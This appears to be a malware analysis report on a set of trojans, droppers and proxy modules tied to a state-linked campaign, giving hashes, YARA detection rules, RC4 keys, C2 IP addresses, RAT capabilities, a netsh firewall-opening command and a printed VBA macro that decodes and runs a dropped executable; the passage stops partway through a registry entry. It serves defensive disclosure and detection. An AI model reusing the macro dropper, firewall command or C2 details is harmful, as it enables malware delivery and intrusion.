Details
NameBF474B8ACD55380B1169BB949D60E9E4
Size466241 bytes
TypePE32 executable (GUI) Intel 80386, for MS Windows
MD5bf474b8acd55380b1169bb949d60e9e4
SHA1c60c18fc0226a53be15637ee3ef0b73b0dabd854
SHA256d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92
SHA51246995cf3516c160d2f4fa5957c8c67df75f2768b24562b22de46a5d4ef7ba17fecaef2ad900bc6925e0c4284802864361423653154ad0622af18d049fb0419be
ssdeep12288:G+3/oi/EpRsV97/8Olq3p8YNk5oYEeLxCStEowZVKmZag:Gmoi/EpRsV9S3prgomLE9oVmQg
Entropy7.760001
Antivirus
Microsoft Security EssentialsTrojan:Win32/Autophyte.B!dha
SymantecHeur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yararule enc_PK_header { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4" strings: $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them }
ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-06-08 07:12:45-04:00
Import Hash225e9f7be86d6676c98a852492458049
PE Sections
MD5NameRaw SizeEntropy
21257d58787390491b672d426714b015header40960.592724
dff4417e6006f193afa34a31581d52dd.text532486.423430
5fbeefe580cf5cb5ee032f29c78b5f7b.rdata122883.435650
c5776014ec07771c8d8093a7af1868c7.data163842.126011
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
d1d490866d...Contains40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116
Description

This 32-bit Windows executable is a RAT, designed to install a proxy module as a service on the victim’s system.

The malware's APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05
--End Rc4 key--

Decrypted strings of interest are displayed below:

--Begin strings of interest--
"wmplayer.xml"
"printcache.tlb"
"printcache"
"Print Device Cache"
"Manage Print Device Cache And Printing"
--End strings of interest--

When executed, the malware will load an embedded RC4 encrypted archive file from the start of the offset "0x15000”.

The malware decrypts the archive using the same Rc4 key. The decrypted archive contains a proxy module, which is decompressed and installed from the existing file name "wmplayer.xml" to "C:\Windows\system32\printcache.tlb".

The malware installs the module as a serviceDLL in the "printcache" service group in order to execute "C:\Windows\system32\printcache.tlb" by the Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe”.

--Begin service--
ServiceName = "printcache"
DisplayName = "Print Device Cache"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k printcache"
--End service--

The malware contains an RC4 encrypted configuration file data, which contains port numbers (8 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Signature"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116

Tags

proxytrojan

Details
Name1printcache.tlb
NameCA67F84D5A4AC1459934128442C53B03
Size778240 bytes
TypePE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5ca67f84d5a4ac1459934128442c53b03
SHA1f4eb6a50c60320edafb3e48c612c6a55560d0684
SHA25640ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116
SHA5124695cf69e2ae52fc94eab31cbc3bb846022a3e1516d9bc293118f674ea1eb86468cff0a4c0dee8dff8a2d545df153116e8d86669513426e1b32a205041339e45
ssdeep12288:drrF4D0d2QKPIyWE8QPnWnGHiS2VcL2ZotSNfpV532/dlZ:x6IGnWntQ2ZvfpvmdlZ
Entropy6.710797
Antivirus
AhnlabTrojan/Win32.Agent
BitDefenderGen:Variant.Symmi.14589
EmsisoftGen:Variant.Symmi.14589 (B)
F-secureGen:Variant.Symmi.14589
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-06-08 07:12:35-04:00
Import Hash09e63e3d425d6b543de4003f71c2b66d
PE Sections
MD5NameRaw SizeEntropy
5b1f93f0412e9f1c7a7ad42d729b292bheader40960.769911
e6ea312f762f4df521b229a77f186664.text4751366.629464
b6fa7b267ea19010d44f056ec3cca39d.rdata1474565.920344
1076ec3948d21da8d6c5036548880c63.data778244.972282
77c814f5856057e7a7f6237bbba51a76.rsrc327687.100017
3184d0afb653bf0723cadccc14d92071.reloc409605.752155
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Relationships
40ef57ca2a...Contained_Withind1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92
Description

1printcache.tlb (original name: PDll.dll) is a proxy module installed as a service by the file d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92. This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server.

The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05
--End Rc4 key--

When executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains hexadecimal encoded port numbers:

--Begin port # list --
BB 01 ==> 1BB ==>443
7F 00 ==> 7F ==> 127
FB 20 ==> 20FB ==> 8443
--End port # list --

The malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming connections.

--Begin firewall modification--
"netsh.exe advfirewall firewall add rule name="PortOpenning" dir=in protocol=tcp localport=443 action=allow enable=yes"
--End firewall modification--

The malware attempts to open ports 443, 127, and 8443 and wait for connection. The malware contains public SSL certificates in its resource name "101”. It is designed to generate crafted TLS sessions (fake TLS communication mechanism).

546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1

Tags

droppertrojan

Details
Name6AB301FC3296E1CEB140BF5D294894C5
Size259584 bytes
TypePE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD56ab301fc3296e1ceb140bf5d294894c5
SHA18d62498656db928f987b47bdbcfab5d6032be48a
SHA256546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1
SHA5123abd7a690d821ace78d8f5e2394f0922308963c7ba8ee63661e9cdb2e36fe8353904346b4b0457c6ace3071505533187d62a41d47473a6a9680cab7fca209ceb
ssdeep3072:JdHh7xVwMPRTxXX0bqkmvA7XKmJLiSi3Ix1DKXrlTNEsuFFCeojbmUkGVcNP+:17xVrxxn0PrWiv8hLnS+
Entropy5.918488
Antivirus
AVGAgent6.BHRZ.dropper
AhnlabTrojan/Win32.Agent
ESETa variant of Win32/NukeSped.AK trojan
Microsoft Security EssentialsTrojan:Win32/Autophyte.B!dha
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-05-08 11:43:26-04:00
Import Hashb32c7db2b70ae7b183886924d873c585
PE Sections
MD5NameRaw SizeEntropy
24baa03194bc78f0184ea606128bc80fheader10242.821047
170ce86f9a7ffcd242f3903fafe1f302.text578566.433615
33b066692952c4534ebf0a56ca293085.rdata378885.095210
b4eed5366c4254a3c7f6c2f021c29efe.data1561604.916035
3ad7431aaa87a1e6b6400ca9b273d98a.pdata40964.579212
c23d2715b42b072fcf86b2aa58807b56.rsrc5124.714485
ad711ec082866631d620286bb36fdb72.reloc20484.752156
Relationships
546dbd370a...Contains3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
Description

This file is a malicious 64-bit Windows dynamic-link library (DLL) that is designed to drop and execute an embedded file. The malware decodes the embedded file by XORing it with the value "0x35".

During analysis, the malware executed the file as C:\Windows\Temp\java.exe (3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210). The dropped file has been identified as a RAT.

3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210

Tags

backdoorremote-access-trojantrojan

Details
Namejava.exe
Size118784 bytes
TypePE32 executable (GUI) Intel 80386, for MS Windows
MD577b50bb476a85a7aa30c962a389838aa
SHA1df466a1f473c7c5eba5f22d90822fd1430b6a244
SHA2563c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
SHA51233b78e0bc8832958b79292bfebffe32c03b59b92044bb95331ee384f7061f6724c7d10bcf17ee1395dbd437b225c0813ba4bc5de6ef44f4bdd9ee58e446ad143
ssdeep3072:sPhrkoI8QYJRMs4y5pe+/a5sN5t4+PXP:Mi/lqpe+/0sa
Entropy5.880053
Antivirus
AVGAgent6.BHRZ
AhnlabBackdoor/Win32.Agent
AviraTR/Agent.bkecf
BitDefenderTrojan.GenericKD.30623185
CyrenW32/Trojan.YPCX-1821
ESETa variant of Win32/NukeSped.AK trojan
EmsisoftTrojan.GenericKD.30623185 (B)
F-secureTrojan.GenericKD.30623185
IkarusTrojan.Win32.NukeSped
K7Trojan ( 004fa2411 )
McAfeeTrojan-FNWY!77B50BB476A8
Microsoft Security EssentialsTrojan:Win32/Autophyte.B!dha
NANOAVTrojan.Win32.NukeSped.fajisv
Quick HealTrojan.Cossta
SymantecTrojan.Gen.MBT
TrendMicroTROJ_NUKESPED.A
TrendMicro House CallTROJ_NUKESPED.A
VirusBlokAdaTrojan.Cossta
Zillya!Trojan.Cossta.Win32.10325
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-04-28 03:28:32-04:00
Import Hash85c89bf0449505044219f0be26213402
Company NameMicrosoft Corporation
File DescriptionProQuota
Internal Nameproquota
Legal CopyrightMicrosoft Corporation. All rights reserved.
Original Filenameproquota.exe.mui
Product NameMicrosoft Windows Operating System
Product Version6.1.7600.16385
PE Sections
MD5NameRaw SizeEntropy
81c12eb5fc3cbdd06675cd1097363a40header40960.689960
2539474aa6202371abd37a4d66031955.text860166.641666
b97c14b801643b3a61ea28266f3f71b1.rdata81924.735406
48eb8a67d4fd42ea24da9dc9029cb101.data163841.857068
c139ac9cb34e0620a10c15e5d42b85d2.rsrc40961.174962
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
3c809a1010...Contained_Within546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1
3c809a1010...Connected_To184.107.209.2
3c809a1010...Connected_To111.207.78.204
3c809a1010...Connected_To80.91.118.45
3c809a1010...Connected_To181.119.19.56
Description

This file is a 32-bit Windows executable designed to connect to its remote server and wait for instructions. The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B
--End Rc4 key--

This file is a RAT and contains the following embedded hexadecimal encoded C2 IP addresses and port numbers:

--Begin IP and port # list--
1BBh ==> 443
2D765B50h ==> 80.91.118.45
381377B5h ===> 181.119.19.56
0CC4ECF6Fh ==> 111.207.78.204
2D16BB8h ==> 184.107.209.2
--End IP and port # list--

When executed, it attempts to connect to its C2 IPs using port 443 and waits for instructions. The malware is designed to accept instructions from the remote server to perform additional functions:

--Begin functions perform by the malware--
Search for files
Execute process
Terminate processes
Delete files
Execute command-using shell
Download and upload files
Read files and write files
--End functions perform by the malware--

The malware is designed to use the same RC4 key to encrypt its configuration file data, which contains the hexadecimal encoded C2 IP address and port number. The encrypted configuration data is stored into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd

Tags

downloaderdroppertrojan

Details
Name3229A6CEA658B1B3CA5CA9AD7B40D8D4
Size712192 bytes
TypeComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 949, Author: ISkyISea, Template: Normal, Last Saved By: ISkyISea, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 17:00, Create Time/Date: Mon Apr 3 18:36:00 2017, Last Saved Time/Date: Thu Apr 6 00:34:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD53229a6cea658b1b3ca5ca9ad7b40d8d4
SHA170730e608e2fcc68ce468ed148e965c5bacfb51c
SHA2564bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd
SHA512ff385a9446415412950562cca832eab1d17de56932f3633a86202dea829e8bd25e56864306f2e6c8bb7ff7d2cfe2785acc4261410e38348946baf72d4a0696de
ssdeep12288:sh+81FiNloAzjMXJ1NPeZ3eMNZtF7fHRRAug0EX7:W1FiNWEYxeV3NfHDe
Entropy5.446016
Antivirus
BitDefenderVB:Trojan.Valyria.401
ESETVBA/TrojanDropper.Agent.YE trojan
EmsisoftVB:Trojan.Valyria.401 (B)
F-secureVB:Trojan.Valyria.401
McAfeeW97M/Dropper.dj
Microsoft Security EssentialsTrojanDropper:O97M/SilverMob.A!dha
NANOAVTrojan.Ole2.Vbs-heuristic.druvzi
Quick HealW97M.Downloader.BJS
SophosTroj/DocDl-KOR
nProtectSuspicious/W97M.Obfus.Gen
Yara Rules

No matches found.

ssdeep Matches

No matches found.

Description

This is a malicious Microsoft Word document, and contains Visual Basic for Application (VBA) macros. When the Word document is opened, the user is prompted to enable the use of macros by the Microsoft Word process. If the user enables macro execution, the embedded malicious macro will be executed and proceed to decode a PE binary and execute it from "%TEMP%\leo.exe”. A code snippet used to decode the malicious binary is displayed below:

--Begin code snippet--

   On Error GoTo gaqz
   
   liveOn = "mfp/fyf"
   
   liveOff = Environ("temp") + "\"
   For qnx = 1 To Len(liveOn)
       liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
   Next
   
   Dim str(238) As String

   str(1) = "Encoded hex data"
   str(2) = "Encoded hex data"
   str(3) = "Encoded hex data"
   str(4) = "Encoded hex data"
   str(5) = "Encoded hex data"
   .......
   .......
   str(238) = "Encoded hex data"

   Dim offBin(499) As Byte
   str(1) = "Encoded hex data"
   str(2) = "Encoded hex data"
   str(3) = "Encoded hex data"
   ......
   ......
   str(499) = "Encoded hex data"

   Open liveOff For Binary Access Write As #1

   lpdq = 1

   For jnx = 0 To 237
       For inx = 0 To 499
           offBin(inx) = Val("&H" + Mid(str(jnx + 1), inx * 2 + 1, 2))
           offBin(inx) = offBin(inx) Xor 231
       Next inx

       Put #1, lpdq, offBin
       lpdq = lpdq + 500
   Next jnx

   Close #1

   jfsukew liveOff



   liveOn = "tfdvsjuzxbsojoh`mndjsu`514/epd"

   liveOffd = Environ("temp") + "\"
   For qnx = 1 To Len(liveOn)
       liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)
   Next qnx

   Dim strd(167) As String
strd(167) = ""

   Dim offBind(499) As Byte

   Open liveOffd For Binary Access Write As #2

   lpdq = 1

   For jnx = 0 To 166
       For inx = 0 To 499
           offBind(inx) = Val("&H" + Mid(strd(jnx + 1), inx * 2 + 1, 2))
           offBind(inx) = offBind(inx) Xor 231
       Next inx

       Put #2, lpdq, offBind
       lpdq = lpdq + 500
   Next jnx
   
   Close #2
   
   SetAttr liveOffd, 6
   
   bazs = ThisDocument.Name
   
   Application.Documents.Open (liveOffd)
   Application.ActiveDocument.ActiveWindow.Caption = bazs
   ThisDocument.Close
   
gaqz:
End Sub

Function Jdhcuad(Input_Str$) As String
   Dim Len_Str%, Result$, Temp_Str$, n%
   
   Len_Str = Len(Input_Str)
   For n = 1 To Len_Str
       Temp_Str = Mid(Input_Str, n, 1)
       Temp_Str = Chr(46 + (Asc(Temp_Str) - 46 - 20 + (122 - 46)) Mod (122 - 46))
       Result = Result + Temp_Str
   Next
   
   Jdhcuad = Result
End Function

Private Sub jfsukew(filename)
   Dim obj As Object
   Set obj = CreateObject(Jdhcuad("kgw:18<Bg0y44"))
   obj.Run filename, 1, False
   Set obj = Nothing
End Sub
--End code snippet--

c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777

Tags

remote-access-trojantrojan

Details
NameBFB41BC0C3856AA0A81A5256B7B8DA51
Size578174 bytes
TypePE32+ executable (GUI) x86-64, for MS Windows
MD5bfb41bc0c3856aa0a81a5256b7b8da51
SHA1cb96e29332fe94d1a70309837f73daf7bec81284
SHA256c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777
SHA51237223163a329ffa7b77a9190aab1da5fbf38c6d76139591d592d695e5caa81b56f6d3769540e2781c87a29de3d39e5e9c8ee70bd9ed6a0bee040917f530bc11a
ssdeep12288:jxn1kOPTkEjkHsnCrYHM46QyFgHj+u1XC1GbA/UXAfAGZI3PWM+:jxn1kOLkEQHsYYDdD+u1HbA/Uw47/L+
Entropy7.848313
Antivirus
AhnlabTrojan/Win32.Akdoor
Yara Rules
hidden_cobra_consolidated.yararule enc_PK_header { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4" strings: $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them }
hidden_cobra_consolidated.yararule import_obfuscation_2 { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51" strings: $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6 D5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3 03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-06-05 21:21:48-04:00
Import Hashc1bcec5e2d5d967daefaff0a252273a6
PE Sections
MD5NameRaw SizeEntropy
55b6d1ed6d76c7d17cc270bc1843d2cbheader10242.558659
6e501513865a783fa945269010ac3785.text696326.390707
45584c7afdc086b651d7299673643506.rdata240644.704433
4a8e757aef91c54de52d5b81098e0cc7.data76804.003255
de3fe99833797faa77379640174d16c4.pdata40964.786623
0cc425d0556c63acb7c04b9b1a211d5b.rsrc5125.105006
914f25782a74f42e42d7974b13bd01c8.reloc15362.869845
Packers/Compilers/Cryptors
Microsoft Visual C++ 8.0 (DLL)
Relationships
c9e3b83d77...Containse088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef
Description

This file is a 64-bit Windows executable version of the file 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8 and is designed to install a RAT as a service on the victim’s system. This file accepts the following arguments during execution "68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd".

The RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

Decrypted strings of interest are displayed below:

--Begin strings of interest--
host.dll
"Task Notification Service"
"Monitors And Notifies Task Scheduling And Interaction"
netsvcs
--End strings of interest--

When executed, the RAT loads an embedded RC4 encrypted archive file from the start of the offset "0x1A800" of the file.

The malware decrypts the archive using the same Rc4 key. The decrypted archive contains a malicious DLL module, which is decompressed and installed into "C:\Windows\system32\dwnhost.dll”. The first three characters of the module name are randomly generated.

The malware contains RC4 encrypted configuration file data (192 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\dwnhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The malware installs a malicious DLL module as a serviceDLL in the "netsvcs" service group in order to execute "C:\Windows\system32\dwnhost.dll" by Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe”. The service name and the display name are randomly generated.

The installed service information is displayed below:

--Begin service--
ServiceName = "NWCWorkstation"
DisplayName = "NWCWorkstation"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k netsvcs"
--End service--

e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef

Tags

remote-access-trojantrojan

Details
Namedwnhost.dll
Size1030144 bytes
TypePE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD59722bc9e0efb4214116066d1ff14094c
SHA141a938499048a6ad8034d09e2fbb893da8f13ca9
SHA256e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef
SHA5128470c240868441093314ebe263028ceef61d900b41aaeed77fd934edf81b9a75f6c96d0fccc0ac87364c8e23e0b8eb19ec8bcd47daf1d50c1182be999475fc4c
ssdeep12288:nqU713B5hV7rJIBBAVbyjRbjSbdSYJ3raxt7o6qRBpDwQmnQ2bqPjD+PmCNVGsPf:nRxJIB7hSZSG37jo/GsPepCdOwy
Entropy6.424883
Antivirus

No matches found.

Yara Rules
hidden_cobra_consolidated.yararule import_obfuscation_2 { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51" strings: $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6 D5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3 03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
ssdeep Matches

No matches found.

Relationships
e088c3a0b0...Contained_Withinc9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777
Description

dwnhost.dll (original name: DLL64.dll) is a 64-bit Windows dynamic-link library (DLL) of "laxhost.dll" (a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6). This RAT module was installed as a service by the file "c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777”.

The RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

When executed, the RAT loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\dwnxhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains a hexadecimal encoded command and control IP address and port number:

--Begin IP and port # list--
BB 01 3B 5A 5D 61 ==> 59.90.93.97:443
--End IP and port # list--

The malware attempts to connect to its remote server IP 59.90.93.97 using port 443 and waits for instructions.

The malware is designed to accept instructions from the remote server to perform the following functions:

--Begin functions perform by the malware--
Get Disk Free Space
Search for files
Execute process in elevated mode
Terminate processes
Delete files
Execute command-using shell
Download and upload files
Read files and write files
Delete Service and uninstall malware components using a batch script
--End functions perform by the malware--

20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64

Tags

remote-access-trojantrojan

Details
NameEF9DB20AB0EEBF0B7C55AF4EC0B7BCED
Size152064 bytes
TypePE32+ executable (GUI) x86-64, for MS Windows
MD5ef9db20ab0eebf0b7c55af4ec0b7bced
SHA10202942d11c994cece943bb873f3af156d820f59
SHA25620abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64
SHA51285fa80079c59da83e3b2471eab0d2981c92b6c589cbe5052bf438831ae464e6499040ead68d6bc9929edd9f6c08ecc6abf2a0173e31bd361a24fad89ff1f7064
ssdeep3072:qocqUTuIzXblpGxqSDBiiBmLEEjdTIf3TIb9Qw/uAZyerrPabYlQ:qJqUnXKxqSAiBJyTC3TIb9QRL0lQ
Entropy6.269643
Antivirus
ESETa variant of Win64/NukeSped.L trojan
Microsoft Security EssentialsTrojan:Win32/Autophyte.A!dha
Yara Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date2016-09-07 14:28:45-04:00
Import Hash13c53cfa11bb74ea99fefdf29d78a9f9
PE Sections
MD5NameRaw SizeEntropy
2082ea5adc4b910e8673c04dc7d962d2header10242.623906
e6e5ce270a5e80221a815dbf739883a2.text1116166.434048
3a7628ebb18c5e07cf37654fd431de6b.rdata261125.315772
52e12517ca5b2c29e9496bc3032f0d5d.data56322.052338
f9b37a6c76a99538605929f5bef6c2e2.pdata56325.165417
d5ecc406ee2be45ed510958b0d4f326a.rsrc5125.112624
07b2edf2675fa88a86c977fec3ad03cd.reloc15362.826598
Packers/Compilers/Cryptors
Microsoft Visual C++ 8.0 (DLL)
Relationships
20abb95114...Connected_To98.101.211.162
20abb95114...Connected_To81.0.213.173
Description

This file is a 64-bit Windows executable designed to connect to its remote server and wait for instructions. The malware’s file APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B
--End RC4 key--

This file is a variant of a RAT that contains the following embedded hexadecimal-encoded C2 IP address and port number:

--Begin IP and port # list--
1BBh ==> 443
0A2D36562h ==> 98.101.211.162
0ADD50051h ==> 81.0.213.173
--End IP and port # list--

When executed, it attempts to connect to its C2 IPs using port 443 and waits for instructions. The malware is designed to accept instructions from the remote server to perform additional functions.

201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33

Tags

proxytrojan

Details
Name1C53E7269FE9D84C6DF0A25BA59B822C
Size126976 bytes
TypePE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD51c53e7269fe9d84c6df0a25ba59b822c
SHA1b775d753671133cbc4919764d2fac0d298166b07
SHA256201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33
SHA5123d3883b9b29e264d023b7034d980b7c206c9fc82010bf7f5f1dc454fdbd316830fe69e90579406a74afc1fca8e266d10c1b46784bd661dcb2815e370a68acd32
ssdeep1536:EaMa/KVyD4hv6LLETuA1x+sh2iE1s44tz4qoWYUwnZ7hUOC2:G8YPZ6LLqQFX4tz4quxY
Entropy6.024087
Antivirus
AhnlabWin-Trojan/Hwdoor.Gen
BitDefenderGen:Trojan.Heur.LP.hu4@amSEbedG
ESETa variant of Win32/NukeSped.AK trojan
EmsisoftGen:Trojan.Heur.LP.hu4@amSEbedG (B)
F-secureGen:Trojan.Heur.LP.hu4@amSEbedG
Microsoft Security EssentialsTrojan:Win32/Autophyte.B!dha
SymantecHeur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yararule import_deob { meta: author = "NCCIC trusted 3rd party" incident = "10135536" date = "2018-04-12" category = "hidden_cobra" family = "TYPEFRAME" md5 = "ae769e62fef4a1709c12c9046301aa5d" md5 = "e48fe20eblf5a5887f2ac631fed9ed63" strings: $ = { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8} $ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6} condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them }
ssdeep Matches

No matches found.

PE Metadata
Compile Date2015-07-08 22:50:54-04:00
Import Hash21ccd1b1341683d8831663fc3ed8f86d
PE Sections
MD5NameRaw SizeEntropy
f066de8df54d4f92795472d981374309header40960.736742
f066de8df54d4f92795472d981374309header40960.736742
e321dba33ae4db3b9e29aa6072b92e77.text573446.464385
e321dba33ae4db3b9e29aa6072b92e77.text573446.464385
a256d5f52608331df8545a9d38751462.rdata81923.628560
a256d5f52608331df8545a9d38751462.rdata81923.628560
1d905ad87919346eb6c8463f61b599e8.data163841.547483
1d905ad87919346eb6c8463f61b599e8.data163841.547483
afdf2120655e37010482a536d552199e.rsrc327687.100033
afdf2120655e37010482a536d552199e.rsrc327687.100033
bbeec3983cc5b2094f8311718d327480.reloc81923.234713
bbeec3983cc5b2094f8311718d327480.reloc81923.234713
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Description

This file (original name: Proxy_SVC_DLL.dll) is a proxy module installed as a service. The proxy installer that installs this module was not available for analysis.

This file is designed to open the Windows Firewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy server. The malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin Rc4 key--
DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B
--End Rc4 key--

When executed, the proxy installer will attempt to load and decrypt the encrypted configuration file data from the registry using the RC4 key.

--Begin registry key--
